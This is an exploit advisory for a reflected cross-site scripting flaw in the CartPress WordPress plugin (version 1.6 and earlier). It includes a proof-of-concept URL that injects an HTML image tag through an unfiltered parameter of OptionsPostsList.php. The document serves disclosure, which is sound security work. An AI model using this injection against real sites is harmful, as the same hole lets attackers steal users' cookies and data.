# Exploit Title: CartPress plugin for Wordpress XSS
# Date: 12/31/2011
# Author: 6Scan (http://6scan.com) security team
# Software Link: http://wordpress.org/extend/plugins/thecartpress/
# Version: <=1.6 (fix was added to existing 1.6)
# Tested on: Linux
# Description: Due to lack of filtering, malicious users could craft links, that would cause cookie and data theft
# Official fix: XSS was in a file, that was no longer used. An update to the version deleted the file (Version was not advanced)

PoC:
http://hostname/wp-content/plugins/thecartpress/admin/OptionsPostsList.php?tcp_options_posts_update=sdf&tcp_name_post_234=%3Cimg%20src=http://www.bing.com/az/hprichbg?p=rb%2fOrcaWhales_ROW818916751.jpg%3E&tcp_post_ids[]=234